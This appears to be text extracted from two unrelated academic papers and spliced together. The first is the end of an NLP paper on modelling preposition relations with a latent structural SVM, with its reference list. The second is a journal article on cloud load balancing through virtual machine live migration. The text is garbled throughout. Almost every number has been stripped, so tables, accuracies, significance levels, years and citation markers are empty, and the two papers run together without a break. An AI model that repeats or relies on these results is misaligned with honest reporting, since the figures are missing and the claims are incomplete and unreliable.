improvements over the system that is unaware of types. superscripts ∗ and † indicate significant improvements over typed and typed+gen respectively at p < . . for model , the improvement of typed over the model with- out types is significant at p < . . our objective is not predicting preposition sense. however, we observe that with model , jointly pre- dicting the sense and relations improves not only the performance of relation identification, but via joint inference between relations and senses also leads to a large improvement in sense prediction accuracy. table shows the accuracy for sense prediction. we http://www.cis.upenn.edu/∼dbikel/software.html see that while model does not lead to a significant improvement in the accuracy, model gives an ab- solute improvement of over %. setting sense accuracy hovy (re-implementation) . joint + model . joint + model . ∗ table : sense prediction performance. joint inference with model , while improving relation performance, does not help sense accuracy in comparison to our re- implementation of the hovy sense disambiguation sys- tem. however, with model , the improvement is statis- tically significant at p < . . . ablation experiments feature sharing across prepositions in our first analysis experiment, we seek to highlight the utility of sharing features between different prepositions. to do so, we compare the performance of a sys- tem trained without shared features against the type- independent system, which uses shared features. to discount the influence of other factors, we use model in the typed setting without any types. table reports the accuracy of relation prediction for these two feature sets. 
we observed a similar improve- ment in performance even when type features are added or the setting is changed to typed+gen or with model . setting accuracy independent . + shared . table : comparing the effect of feature sharing across prepositions. we see that having a shared representation that goes across prepositions improves accuracy of rela- tion prediction (p < . ). different argument candidate generators our second ablation study looks at the effect of the var- ious argument candidate generators. recall that in addition to the dependency governor and object, our models also use the previous word, the previous noun, adjective and verb as governor candidates and the next noun as object candidate. we refer to the candidates generated by the parser as parser only and the others as heuristics only. table compares the performance of these two argument candidate generators against the full set using model in both the typed and typed+gen settings. we see that the heuristics give a better accu- racy than the parser based system. this is because the heuristics often contain the governor/object pre- dicted by the dependency. this is not always the case, though, because using all generators gives a slightly better performing system (not statistically significant). in the overall system, we retain the de- pendency parser as one of the generators in order to capture long-range governor/object candidates that may not be in the set selected by the heuristics. feature sets generator typed typed+gen parser only . . heuristics only . . all . . table : the performance of different argument candi- date generators. we see that considering a larger set of candidate generators gives a big accuracy improvement. discussion there are two key differences between model and . first, the former predicts only the relation label, while the latter predicts the entire structure. table shows example predictions of model for relation label and wordnet argument types. these examples show how the argument types can be thought of as an explanation for the choice of relation label. input relation hypernyms governor object died of pneumonia cause experience disease suffered from flu cause experience disease recovered from flu startstate change disease table : example predictions according to model . the hypernyms column shows a representative of the synset chosen for the wordnet types. we see that in the com- bination of experience and disease suggests the relation cause while the change and disease indicate the rela- tion startstate. the main difference between the two models is in the treatment of the unlabeled (or latent) parts of the structure (namely, the arguments and the types) during training and inference. during training, for each example, model aggregates features from all governors and objects even if they are possibly ir- relevant, which may lead to a much bigger model in terms of the number of active weights. on the other hand, for model , algorithm uses the single high- est scoring prediction of the latent variables, accord- ing to the current parameters, to refine the parame- ters. indeed, in our experiments, we observed that the number of non-zero weights in the weight vec- tor of model is much smaller than that of model . for instance, in the typed setting, the weight vec- tor for model had . million elements while that for model had only . million weights. similarly, for the typed+gen setting, model had . million non-zero elements in the weight vector while model had only . million non-zero elements. 
the learning algorithm itself is a generalization of the latent structural svm of (yu and joachims, ). by setting α to zero, we get the latent struc- ture svm. however, we found via cross-validation that this is not the best setting of the parameter. a theoretical understanding of the sparsity of weights learned by the algorithm and a study of its conver- gence properties is an avenue of future research. conclusion we addressed the problem of modeling semantic re- lations expressed by prepositions. we approached this task by defining a set of preposition relations that combine preposition senses across prepositions. doing so allowed us to leverage existing annotated preposition sense data to induce a corpus for prepo- sition labels. we modeled preposition relations in terms of its arguments, namely the governor and ob- ject of the preposition, and the semantic types of the arguments. using a generalization of the latent structural svm, we trained a relation, argument and type predictor using only annotated relation labels. this allowed us to get an accuracy of . % on re- lation prediction. by employing joint inference with a preposition sense predictor, we further improved the relation accuracy to . %. acknowledgments the authors wish to thank martha palmer, nathan schneider, the anonymous reviewers and the editor for their valuable feed- back. the authors gratefully acknowledge the support of the defense advanced research projects agency (darpa) ma- chine reading program under air force research laboratory (afrl) prime contract no. fa - -c- . this material is also based on research sponsored by darpa under agree- ment number fa - - - . the u.s. government is au- thorized to reproduce and distribute reprints for governmental purposes notwithstanding any copyright notation thereon. the views and conclusions contained herein are those of the authors and should not be interpreted as necessarily representing the of- ficial policies or endorsements, either expressed or implied, of darpa, afrl or the u.s. government. references e. agirre, t. baldwin, and d. martinez. . improv- ing parsing and pp attachment performance with sense information. in proceedings of the annual meeting of the association for computational linguistics (acl), pages – , columbus, usa. t. baldwin, v. kordoni, and a. villavicencio. . prepositions in applications: a survey and introduc- tion to the special issue. computational linguistics, ( ): – . m. chang, d. goldwasser, d. roth, and v. srikumar. a. discriminative learning over constrained latent representations. in proceedings of the annual meet- ing of the north american association of computa- tional linguistics (naacl), pages – , los an- geles, usa. m. chang, v. srikumar, d. goldwasser, and d. roth. b. structured output learning with indirect super- vision. in proceedings of the international conference on machine learning (icml), pages – , haifa, israel. j. clarke, v. srikumar, m. sammons, and d. roth. . an nlp curator (or: how i learned to stop wor- rying and love nlp pipelines). in proceedings of the international conference on language resources and evaluation (lrec), pages – , istanbul, turkey. j. cohen. . a coefficient of agreement for nominal scales. educational and psychological measurement, : – . d. dahlmeier, h. t. ng, and t. schultz. . joint learning of preposition senses and semantic roles of prepositional phrases. in proceedings of the confer- ence on empirical methods for natural language pro- cessing (emnlp), pages – , singapore. d. das, n. schneider, d. 
chen, and n. smith. . probabilistic frame-semantic parsing. in proceedings of human language technologies: the annual conference of the north american chapter of the as- sociation for computational linguistics, pages – , los angeles, usa. c. fillmore, c. johnson, and m. petruck. . back- ground to framenet. international journal of lexi- cography, ( ): – . d. gildea and d. jurafsky. . automatic label- ing of semantic roles. computational linguistics, ( ): – . y. goldberg and m. elhadad. . an efficient algo- rithm for easy-first non-directional dependency pars- ing. in proceedings of human language technolo- gies: the annual conference of the north ameri- can chapter of the association for computational lin- guistics, pages – , los angeles, usa. d. hovy, s. tratz, and e. hovy. . what’s in a prepo- sition? dimensions of sense disambiguation for an in- teresting word class. in coling : posters, pages – , beijing, china. d. lin. . automatic retrieval and clustering of sim- ilar words. in proceedings of the annual meeting of the association for computational linguistics (acl), pages – , montreal, canada. k. litkowski and o. hargraves. . the preposition project. in acl-sigsem workshop on the linguistic dimensions of prepositions and their use in computa- tional linguistics formalisms and applications, pages – , colchester, uk. k. litkowski and o. hargraves. . semeval- task : word-sense disambiguation of prepositions. in proceedings of the fourth international workshop on semantic evaluations (semeval- ), pages – , prague, czech republic. k. litkowski. . proposed next steps for the prepo- sition project. technical report - , cl research. a. meyers, r. reeves, c. macleod, r. szekely, v. zielin- ska, b. young, and r. grishman. . the nom- bank project: an interim report. in hlt-naacl workshop: frontiers in corpus annotation, pages – , boston, usa. t. o’hara and j. wiebe. . exploiting semantic role resources for preposition disambiguation. computa- tional linguistics, ( ): – . m. palmer, d. gildea, and p. kingsbury. . the proposition bank: an annotated corpus of semantic roles. computational linguistics, ( ): – . m. palmer, d. gildea, and n. xue. . semantic role labeling, volume . morgan & claypool publishers. v. punyakanok, d. roth, and w. yih. . the impor- tance of syntactic parsing and inference in semantic role labeling. computational linguistics, ( ). d. roth and w. yih. . a linear programming formu- lation for global inference in natural language tasks. in proceedings of the annual conference on compu- tational natural language learning (conll), pages – , boston, usa. d. roth and w. yih. . global inference for en- tity and relation identification via a linear program- ming formulation. introduction to statistical rela- tional learning. v. srikumar and d. roth. . a joint model for extended semantic role labeling. in proceedings of the conference on empirical methods in natural lan- guage processing (emnlp), edinburgh, scotland. s. tratz and d. hovy. . disambiguation of prepo- sition sense using linguistically motivated features. in proceedings of human language technologies: the annual conference of the north american chap- ter of the association for computational linguistics, companion volume: student research workshop and doctoral consortium, pages – , boulder, usa. s. tratz. . semantically-enriched parsing for natu- ral language understanding. ph.d. thesis, university of southern california. i. tsochantaridis, t. hofmann, t. joachims, and y. altun. . 
support vector machine learning for interde- pendent and structured output spaces. in proceedings of the international conference on machine learning (icml), pages – , banff, canada. p. ye and t. baldwin. . semantic role labeling of prepositional phrases. acm transactions on asian language information processing (talip), ( ): – . p. ye and t. baldwin. . melb-yb: preposition sense disambiguation using rich semantic features. in proceedings of the fourth international workshop on semantic evaluations (semeval- ), pages – , prague, czech republic. c. yu and t. joachims. . learning structural svms with latent variables. in proceedings of the inter- national conference on machine learning (icml), pages – , montreal, canada. b. zapirain, e. agirre, l. màrquez, and m. surdeanu. . selectional preferences for semantic role classi- fication. computational linguistics, pages – . international journal of advanced network monitoring and controls volume , no. , research and implementation of load balancing technology for cloud computing sun hong , wang weifeng , chen shiping and xu liping university of shanghai for science and technology, china, sunhong@usst.edu.cn university of shanghai for science and technology, china, wwfhuo@ .com university of shanghai for science and technology, china, chensp@usst.edu.cn university of shanghai for science and technology, china, email: @qq.com abstract. this article selects load balancing system technology to analyze, combines the live migration technology of virtual machine, and studys the frame of virtual machine live migration as well as the mathematical model applied to concrete process of the migration. the article presents that the process of combining the specific strategies of load balance to the frame of live migration, that the simulation experiment and conclusion to this total process. the study takes eucalyptus as experimental platform, and decides initial to take xen as experimental virtual machine. the article’s innovations are to optimize the design of virtual machine live migration in cloud environment, and to combine the specific strategies of load balance to the process of live migration. after designing and analyzing the specific strategies of load balance modularization, according to rationalizations that the technology of live migration can apply to the specific strategies of load balance, the study sets the measure index to evaluate load balance, and solute consequently the problem of load in cloud environment, which is realized in the process of live migration. it turned out that algorithm fusion raised has obvious performance advantages. keywords: cloud computing, visualization, modularization, live migration, load balance . introduction with the fast development of the internet and network, people rely more and more increasingly on the access to the internet for getting information. amount of data transmission in network and user request appears exploded increase, which raises a higher claim to server processing ability, and makes server sent answer-response in the shortest possible time on the basis that servers accept reasonably client request to improve user experience optimization. a huge amount of data and access request does cry for updating servers, which can response fleetly, are easy-to-use, and have high expansibility to expand network bandwidth in response to user request timely. the appearance of virtual machine live migration is the very effective approach to settle load imbalance. 
by means that the total virtual machine running state can mutual transfer smoothly between two physical hosts of random clusters, of course, which is processing and does not have any stagnant feelings for the users when it is necessary to migrate, virtual machine live migration can help cloud environment maintainer make full use of node server in the international journal of advanced network monitoring and controls volume , no. , cluster and dynamically achieve load balancing of cloud resources. the traditional load balance algorithm is based on task control allocation, when applied to the cloud environment, it has some disadvantages: small task control allocation particles, node load conditions vary greatly, load information cannot be updated in a timely manner, load balance algorithm [ ] will be misguided. task control allocation needs a central dispatcher, which is in full charge of dispatch and migration, the huge amount of dispatch and migration will make central dispatcher busy and cause disorders easily, which is also a major bottleneck of system performance. there will be more computational tasks in cloud computing environment, the complexity of allocation algorithm will face greater challenges and the availability of algorithm needs more attention. . framework design of dynamic of virtual machine in cloud environment . basic framework for dynamic migration of virtual machine the basic migration structure is implemented by four modules including monitor migration, operation migration, freezing and target domain arousal with the four functions of the corresponding modules to achieve[ ].as shown in figure . monitor migration module: the primary function of the primary module is to determine the source machine of the migration, the start time of the migration, and the target machine of the migration. the working mode of monitor migration module is determined by the purpose of migration. in order to ensure that the load of each node is balanced, the monitor signal is set in the virtual machine management program, the monitoring load operation of various nodes determines whether the monitor signal needs to migrate. operation migration module: the module is the most important module, and undertakes the most migration of the virtual machine and most work of the migration process. after the start of the migration, the module collects running information of the source machine, and at the same time sends “frozen” signal to freezing module to make the source machine downtime. then the module continues to copy the remaining pages, after the end of the copy, it sends a wake-up call to wake module of the destination machine. this process is the key part of the whole migration process, and directly influents the downtime in the migration process and migration time. freezing module: the module is mainly responsible for how to solve the system to provide users with uninterrupted service [ ] to make users feel the service without interruption. target domain arousal module: the function of this module is to determine the time to wake up the destination machine, to make sure that the arousal target machine is in line with the source machine on service, and how to maintain the consistency of the target domain and the original domain on service. after downtime, the module is operated to copy the remaining memory page and sends a wake-up call to wake module of the destination machine after the end of the copy. 
the direct consequence of downtime is to make the connecting device interrupt, peripheral device cannot connect to the virtual machine, which will certainly cause peripheral service is not timely or presents a variety of transmission errors. research and implementation of load balancing technology for cloud computing figure. basic dynamic migration module figure. dynamic migration framework optimization modules . dynamic migration framework optimization of virtual machine in order to increase the rate of load application and make migration process more smooth and effective, we make the frame design of the virtual machine dynamic migration optimized, and add module about the implementation of the load balancing. one load monitor module adds to the original monitor migration module, which is devoted to marking the operation information of current virtual machine, setting the trigger condition for migration, and paving the way for a subsequent migration to select the appropriate load. the other is mainly in charge of location and selection strategy after the start of the virtual machine migration. as shown in figure ,grey patterns mark three modules. . implementation of resource load balancing algorithm in cloud computing environment . overview of load balancing mutual use of servers is increasingly frequent, because there is a huge gap between the effective use of resources on the servers. some servers are often in a competition for resources state, some for a long time are rarely even without the use of resources, which greatly reduces the resource utilization of corresponding range of system and leads to the severe decrease of performance of the overall cluster system. load balance can be directly implemented by hardware level, for example increasing physical international journal of advanced network monitoring and controls volume , no. , device, and by software level, such as setting the relevant protocol and using specific software. hardware implementation is to install a load balancer connected to the external network, through which the server for user access in the load application and user can access the resources. hardware can make the processing capability of the cluster system stronger, at the same time, and promote the equalization performance, but it cannot effectively master real-time status of server, because it parses the data flow only from the network layer, which is not flexible enough. an effective load balancing algorithm not only be able to assign the load evenly to every server, which can reduce the users’ waiting time, but also need to migrate the load above the node over the load value to the node that does not cross the threshold or relatively easy to operate[ ]. load balancing problem is a classic combinatorial optimization problem. that distribution and redistribution of tasks and resources on each node ultimately make each node load benefit roughly in balance and improve the overall system performance is load balancing. load balancing algorithm, with respect to the load sharing algorithm, has a higher goal performing the more efficient allocation use of resources. . classificiation of load balancing load balancing varies and should be classified on application scope. 
classified on the task distribution and redistribution of the nodes to achieve the strategy of the algorithm, the load balancing technology can be classified as follows: ) implementation methods of hardware and software hardware load balancing primarily implements large system method in the high flow loss, and must increase the specific load balancer, of course, which will have better performance based on the increased cost. however software load balancing is applicable for some small and medium sized web sites or systems, software methods can be very convenient to be installed to the node server. the use of more commonly used url redirection in computer networks or a technique based on the internet such lvs to achieve a certain balanced load function can achieve the general equilibrium load demand. ) global and local methods classified according to the geographical distribution of the server, global load balancing technology is a certain degree of load balancing for multiple servers, which is distributed in the different regions. for access users, global load balancing technology automatically adjusts to the nearest point of the region by determining the location of the ip address. local load balancing technology can control scheduling process some node of node server cluster in a regional scale at the time to a certain degree and make the node load relatively balanced. the technology can strengthen practical effect through node server designed and make network bandwidth be even distributed to every node server in server cluster. ) dynamic and static methods the load balancing strategy in cloud computing is divided into two types, static state and dynamic state. the so-called dynamic decides from which overload node server chooses task and locates the target node to assign tasks according to the current state of the system. once a node task of the system is overloaded, some tasks on this overloaded node will be migrated to other nodes to process, and to achieve the results of dynamic equilibrium. certainly, task migration also brings additional consume research and implementation of load balancing technology for cloud computing to the system. according to the simple system information, the mathematical function scheduling algorithm is used to select the source node and then locate the destination node and assign tasks and execute, which is the static performance. static strategy implementation is relatively simple, but it is not fast enough and cannot dynamically adjust the information of each node as far as real-time response, and consequently some nodes utilization is very low. most of the typical static load balancing strategies are based on the prediction model, for example algorithm based on inheritance, which can predict the trend of nodes according to the current information and historical information of nodes, and then give priority to high available future nodes to resource scheduling and task allocation. . clound resource load balancing strategy there are a lot of physical servers in the cloud environment and these server specifications are not fully consistent. through virtualization technology, a single physical node can be modeled as a number of computing machine entities, these virtual machines assign dynamically automatically to the user according to the user’s requirements specification. but because of the user’s requirement specification is not consistent, and the configuration of all the physical servers in the cluster is also not consistent. 
traditional algorithm can balance load to a certain degree, but each algorithm itself have their obvious characteristics and deficiencies and exist such disadvantages, which makes the equalization effect disadvantaged and influences the service performance or causes other problems related [ ]. at present, the main base of load balancing strategy has been divided into types. no. is ratio strategy, no. is minimum number of connections strategy, no. is round-robin strategy, no. is fastest response time strategy. ratio strategy installs firstly the external request, and then pre-allocated to each load in a balanced state of the server. cloud environment system has servers, we can assume that the proportion of the probability of receiving a virtual machine migration request is : : : ,so each node server processing request is also different. the method is suitable to be responsible that the node server of load balance allocated according to the level of the hardware configuration, and set corresponding ratio depending on the corresponding processing efficiency, so that servers which have not the same properties can also be operated smoothly to prevent some servers overload and others in idle state. minimum number of connections strategy is that the hardware device responsible for the balanced effect monitors continuously and checks the number of connections on the relevant node server, selects a minimum number detected node as the purpose node of processing the request, which is suitable for application to long connections. round-robin strategy: the scheduler is applied to this strategy regardless of load status of destination node. as long as there is an external request, the request will be distributed to each node server, for example, there are servers in the cluster system, and the request servers will process are the same. because of handling all transactions on average, this way is only suitable for the same hardware configuration nodes. this mode achieves relatively simple, the algorithm is also very simple to design, and the system overheads less, only to deal with the small business which have small differences and spend a short time. fastest response time strategy: the hardware devices send requests to be processed to each node continuously, which node is the fastest on response speed, the request is forwarded to the node server. the algorithm is suitable for stringent real-time response, but this method does not consider the load state of the destination node, which is easily prone to heavy load and causes stress to the international journal of advanced network monitoring and controls volume , no. , high configure servers. . optimization algorithm of resource load balancing network nodes often contain memory resources, network bandwidth resources and other key resources. in order to describe accurately the use of various types of resources in the nodes, the load index vector is often used to describe. each of these components is corresponding to a key resource in the node, which is used to represent the load usage. the algorithms mainly focus on three kinds of resources: cpu, memory and network bandwidth. 
To ensure efficient utilization of resources, the cloud computing system is considered as a whole: the load of each server node is calculated, the framework design is combined with dynamic migration, and virtual machine migration technology is used to decide which virtual machine to select from an overloaded node, how to determine the migration destination, and how to coordinate the load of the different servers. This paper focuses on the load balancing part of the framework; its module structure is shown in the accompanying figure (Figure: load balancing algorithm module).

Load monitor module: the resources of different nodes are heterogeneous. So that load values of the same kind can be compared across nodes, each component is standardized and described in a unified way. The CPU load benefit is obtained from the average utilization rate of all CPUs on the node, and the memory and network bandwidth benefits from the corresponding resource usage relative to the node's specification. The three load benefits are defined as follows.

1) CPU load interest (CLI). Calculate the average utilization rate of all CPUs on the node and use it to reflect the node's CPU load. If the node has m physical CPUs and the utilization rate of CPU i is c_i, the CPU load interest of the node is

    CLI = (1/m) * sum_{i=1..m} c_i

2) Memory load interest (MLI). The memory load of a single virtual machine includes the memory currently in use and the memory used for paging. If there are m virtual machines on the node, vused_k is the memory being used by virtual machine k, vchanged_k is the memory of its paged pages, and total_v is the total memory of the node, then the memory load of the node is

    MLI = ( sum_{k=1..m} (vused_k + vchanged_k) ) / total_v

3) Network bandwidth load interest (BLI). The bandwidth load of a node is defined as the ratio of the sum of the bandwidth used by each virtual machine to the total bandwidth. If there are m virtual machines on the node, vnetband_k is the bandwidth virtual machine k is using, and totalband is the maximum bandwidth of the node, then

    BLI = ( sum_{k=1..m} vnetband_k ) / totalband

Load migration module: the migration of a virtual machine involves transferring the state and resources of the original host (internal memory, CPU, and I/O devices). The load migration module adopts operation strategies to describe the current load condition of each server node, records it in real time, and provides the load indices of the server node's resources. For the heterogeneous nodes appearing in the system, the load operation strategies likewise standardize their description and eliminate the heterogeneity, so that the resources can be used conveniently. The load operation strategies comprise a selection rule, a distribution rule, and a location rule [ ].

Usually, more than one virtual machine node needs to be migrated in a cloud computing system, and equally, more than one server satisfies the conditions for accepting a migrated virtual machine. If the physical node with the best performance in the current environment is always taken as the most suitable destination machine, then all overloaded nodes choose the same destination node to migrate to. This is bound to cause a sharp increase in that node's load within a short period of time, and in severe cases the destination node collapses. This phenomenon is called the cluster effect [ ].
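As an illustration of the three definitions above, the following Python sketch computes CLI, MLI, and BLI from per-node and per-virtual-machine statistics. The data structures and field names are hypothetical; the paper does not specify an implementation.

```python
# Illustrative sketch (not the paper's code): computing the three load
# interests defined above for one node.  All field names are hypothetical.

from dataclasses import dataclass
from typing import List

@dataclass
class VMStats:
    mem_used: float       # memory currently in use (MB), "vused_k"
    mem_paged: float      # memory used for paging (MB), "vchanged_k"
    net_bandwidth: float  # bandwidth in use (Mbit/s), "vnetband_k"

@dataclass
class NodeStats:
    cpu_utilisation: List[float]  # one utilisation value in [0, 1] per physical CPU
    total_memory: float           # total node memory (MB), "total_v"
    total_bandwidth: float        # maximum node bandwidth (Mbit/s), "totalband"
    vms: List[VMStats]

def cpu_load_interest(node: NodeStats) -> float:
    """CLI: average utilisation over the node's m physical CPUs."""
    return sum(node.cpu_utilisation) / len(node.cpu_utilisation)

def memory_load_interest(node: NodeStats) -> float:
    """MLI: (sum of used + paged memory over all VMs) / total node memory."""
    used = sum(vm.mem_used + vm.mem_paged for vm in node.vms)
    return used / node.total_memory

def bandwidth_load_interest(node: NodeStats) -> float:
    """BLI: (sum of bandwidth used by all VMs) / total node bandwidth."""
    used = sum(vm.net_bandwidth for vm in node.vms)
    return used / node.total_bandwidth
```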
Firstly, we identify the set of nodes that satisfy the low-load condition and select the destination node from this set when locating, concentrating on two performance indicators of the candidate nodes: CPU computing capacity and memory capacity. If a node has insufficient memory while its CPU capacity remains ample, or the opposite, the virtual machine placed on that physical node cannot run properly and resources are wasted. To avoid such waste as far as possible, the ratio of memory resources to CPU computing resources on the physical node should be kept balanced so that utilization is optimal; when selecting a destination node we therefore mainly consider the matching degree between the virtual machine to be migrated and the destination node, that is, the proportion of CPU consumption to memory consumption.

Table: algorithm symbols and meanings
  (Cmigri)cost     CPU usage rate of the virtual machine to be migrated from node n_i
  (Mmigri)cost     memory utilization of the virtual machine to be migrated from node n_i
  (Ci)cost         CPU utilization consumed on node n_i
  (Mi)cost         memory utilization occupied on node n_i
  (Ci)max          CPU utilization threshold that triggers migration on node n_i
  (Ci)available    available CPU rate of node n_i
  (Mi)available    available memory of node n_i
  (UCRi)matched    UCR matching threshold of node n_i
  Nchoosed         destination node

The matching index is the ratio of CPU consumption to memory consumption, applied both to the virtual machine to be migrated and to a candidate node:

    UCR_cost = (Cmigri)cost / (Mmigri)cost
    UCR_available = (Ci)available / (Mi)available

Firstly, according to the measurement index UCR_available of the target node servers, the measurement index UCR_cost of the virtual machine, and the performance of the target nodes, we select k destination nodes from the cluster that meet the requirements. Then a probability model over the r_available values of the k labelled nodes is built for location. Suppose the current available resource capability of node i is (r_i)available and the probability that the node accepts the migrated virtual machine is p_i; from the description above, the probability that node i is selected as the migration destination is

    p_i = (r_i)available / sum_{j=1..k} (r_j)available

Suppose the destination node set is {n1, n2, n3, n4, n5} and the available resource capability r_available of each node is known; the formula above then assigns each node a location probability p_i. Lastly, when the host selects a destination node for dynamic virtual machine migration, a random function generates an arbitrary number in [0, 1]; the probability interval into which this number falls determines the target node, and that node is the one the virtual machine migration finally chooses.

When a migration is triggered, the physical hosts with a strong remaining capacity to use resources therefore have a large probability of being chosen as the target node of the migrated virtual machine: the lower the utilization ratio of a node's resources, the greater its chance of being selected as a destination node, and the smaller otherwise. From the example we can see that the more idle a node is, the greater the probability interval it occupies and the larger the chance that the generated random number falls inside that interval, so the node is more likely to be selected as the migration destination node. In summary, the probability mechanism prevents, to a certain extent, the occurrence of the cluster effect, and the load balance of the server cluster in the cloud environment is better realized.
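The location rule just described amounts to a roulette-wheel draw over candidate nodes weighted by their available resources. A minimal Python sketch, with hypothetical node names and spare-capacity values, follows.

```python
# Illustrative sketch (hypothetical names): probability-based location rule
# described above.  Candidate nodes are weighted by their available resource
# capability, and a roulette-wheel draw picks the migration destination, so
# overloaded nodes do not all pile onto the single "best" node.

import random
from typing import Dict

def pick_destination(available: Dict[str, float],
                     rng: random.Random = random.Random()) -> str:
    """available maps node name -> (r_i)available; returns the chosen node."""
    total = sum(available.values())
    draw = rng.random()          # arbitrary number in [0, 1)
    cumulative = 0.0
    for node, r in available.items():
        cumulative += r / total  # p_i = r_i / sum_j r_j
        if draw < cumulative:
            return node
    return node                  # guard against floating-point rounding

# Example: five candidate destination nodes with assumed spare capacities.
candidates = {"n1": 0.10, "n2": 0.35, "n3": 0.20, "n4": 0.25, "n5": 0.10}
print(pick_destination(candidates))
```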
Experimental results and analysis

Experimental environment and platform. We choose Eucalyptus, which is highly modular, offers rich interfaces, and suits C, as the experimental platform for the cloud environment. Eucalyptus is an open-source project [ ]; it is a research outcome of the globally hot topic of cloud computing that has been put into practice. It implements the IaaS service and enables users to allocate and manage physical resources through Xen or KVM virtualization. Eucalyptus exposes both SOAP and REST interfaces, so in a cloud environment based on the Eucalyptus platform, visitors from outside the cloud can connect for common operations through either the SOAP or the REST interface.

The experiments use several PC machines to build a system suitable for experimentation; its topology is shown in the figure (Figure: experimental environment topology). The detailed configuration of each node is given in the two tables below.

Table: node hardware configuration
  Type      Device               CPU          Memory   Hard disk
  PC (CC)   cluster controller   dual-core    -        -
  PC (NC)   node controller      dual-core    -        -
  PC (NC)   node controller      dual-core    -        -
  PC (NC)   node controller      dual-core    -        -

Table: node software configuration
  Type      OS       Platform and modules
  PC (CC)   Ubuntu   MySQL + Eucalyptus + load balancing module
  PC (NC)   Ubuntu   Eucalyptus + load monitoring module + anomaly detection module + Xen
  PC (NC)   Ubuntu   Eucalyptus + load monitoring module + anomaly detection module + Xen
  PC (NC)   Ubuntu   Eucalyptus + load monitoring module + anomaly detection module + Xen

Experimental results and analysis. We first summarize the characteristics of the algorithm before describing the experiments. Firstly, the load balancing module is integrated into the dynamic migration framework, whereas previous dynamic migration frameworks were limited to the migration process itself and considered it separately from resource scheduling; handling migration in the cloud environment that way easily solves one problem only to produce a new one. Secondly, new trigger rules based on a load prediction mechanism are used, which differ from traditional trigger rules based on fixed thresholds and mainly prevent transient load peaks from triggering frequent migrations. Lastly, the utilization of both CPU and memory is considered comprehensively in the selection and location rules; in particular, the location rule uses the probability mechanism for choosing migration destination nodes and prevents the occurrence of the cluster effect, so that the load balance of the server cluster in the cloud environment is realized well. In addition, the location probability computed for each node is relatively independent and does not affect the others, and under these circumstances the balance of the cloud data centre is better.

The first set of simulation experiments tests the migration trigger time. One of the nodes is selected and its CPU load utilization is monitored, with a fixed trigger threshold. As the corresponding figure shows, at the first time t at which the CPU load of the node exceeds the threshold, the traditional trigger rule immediately triggers a migration [ ]. The prediction-based trigger rule, however, can partly predict that the node load is on the decline and therefore does not trigger the migration.
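A minimal sketch of a prediction-based trigger of the kind just described is given below. The linear extrapolation used as the forecast is an assumed stand-in for whatever prediction model an implementation would use; the threshold and sample values are hypothetical.

```python
# Illustrative sketch (not from the paper): a prediction-based migration
# trigger.  A plain threshold rule fires on any transient spike; here a short
# history is used to forecast the next sample, and migration is only triggered
# when the load is over the threshold now AND predicted to stay over it.

from collections import deque

class PredictiveTrigger:
    def __init__(self, threshold: float, history_len: int = 5):
        self.threshold = threshold
        self.history = deque(maxlen=history_len)

    def _forecast(self) -> float:
        """One-step-ahead forecast via last-difference extrapolation (assumed)."""
        h = list(self.history)
        if len(h) < 2:
            return h[-1]
        return h[-1] + (h[-1] - h[-2])

    def should_migrate(self, cpu_load: float) -> bool:
        self.history.append(cpu_load)
        over_now = cpu_load > self.threshold
        over_next = self._forecast() > self.threshold
        return over_now and over_next   # ignore peaks that are about to decay

trigger = PredictiveTrigger(threshold=0.85)
for sample in [0.70, 0.95, 0.88, 0.80]:   # a spike that decays below threshold
    print(sample, trigger.should_migrate(sample))
```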
In addition, at a later time t, because the forecast predicts that the coming interval contains the load peak, the first threshold crossing is not acted on immediately; only at a subsequent time t is the migration actually triggered. Compared with the traditional threshold-based algorithm, which would have triggered three migrations during this period and consumed a large amount of virtual machine migration resources, this avoids the additional waste. (Figure: experimental environment topology. Figure: comparison with the traditional method.)

In the emulated cloud environment of the second experiment, three machines with the same configuration serve as nodes and are initialized with different load conditions over time. A fixed percentage of system resource usage is taken as the overload limit, and the request queue is stipulated to contain a single service type. The initial load condition of each node is set manually, and the request queue is distributed by the task scheduler. The calculation of system resource utilization and the dynamic migration rules follow the methods introduced in the previous section, and the resulting system resource utilization is shown in the figures. We test the location algorithm for selecting migration destination nodes, take the case without any load balancing algorithm as the baseline, and compare against the load balancing algorithm based on the optimal-adaptation rule. The load balance of the system is evaluated by the standard deviation of the load benefit. The experimental results are shown in the following figures. (Figure: node load variation. Figure: CPU load balancing.)

In the node-load figure, one node is in an overloaded state from the very start, but no balancing migration happens immediately, owing to the effect of the trigger rule; this also verifies, from another angle, the effectiveness of the prediction-based trigger rule. At a later time t, the overloaded node triggers a migration and moves a virtual machine to another node, whose utilization rate then rises noticeably. Although the originally overloaded node is relieved, because of the migrated virtual machines the utilization rates of the other two nodes become higher than its own. At a still later time t, the virtual machines on those two nodes each migrate part of their load back to the first node; at the end of this balancing period the resource utilization rates of the nodes are similar and in a balanced state, so approximate load balancing is achieved.

From the CPU figure we can see that the distribution of the CPU load standard deviation is more balanced overall under this algorithm [ ], with the standard deviation mostly staying below a small bound. The memory and network bandwidth results show an even clearer advantage, and the resources of each node in the cluster can be used reasonably, as shown in the following figures. (Figure: memory load balancing. Figure: network bandwidth load balancing.)
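The balance metric used in these experiments is the standard deviation of a load benefit (CLI, MLI, or BLI) across the cluster's nodes: the smaller the deviation, the more evenly the resource is used. A small sketch with hypothetical snapshot data:

```python
# Illustrative sketch (hypothetical data): evaluating balance as the standard
# deviation of one load benefit over all nodes.

from statistics import pstdev
from typing import Dict, List

def balance_score(load_benefit_per_node: List[float]) -> float:
    """Population standard deviation of one load benefit over all nodes."""
    return pstdev(load_benefit_per_node)

# Example snapshot: CPU, memory and bandwidth load interests on three nodes.
snapshot: Dict[str, List[float]] = {
    "cli": [0.82, 0.31, 0.28],   # very uneven CPU load before balancing
    "mli": [0.55, 0.50, 0.47],
    "bli": [0.40, 0.42, 0.39],
}
for resource, values in snapshot.items():
    print(resource, round(balance_score(values), 3))
```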
We optimize and realize the design of load balancing in the cloud environment and make the relevant rules, such as the trigger rule, the selection rule, and the location rule, as modular as the platform allows. The problem underlying traditional threshold-based load balancing systems for cloud computing is re-analyzed and improved: the trigger rule is no longer based simply on a threshold value but on probability-based prediction. The selection and location rules both take CPU and memory usage fully into account and analyze the best migration choice in terms of overall consumption: the more available resources a node has, the more easily a virtual machine is migrated to it as the most suitable destination node. After the overall theoretical system is integrated, we conduct the experiments and analyze the results; the comparative analysis of CPU, memory, and bandwidth shows obvious performance advantages.

Summary and outlook

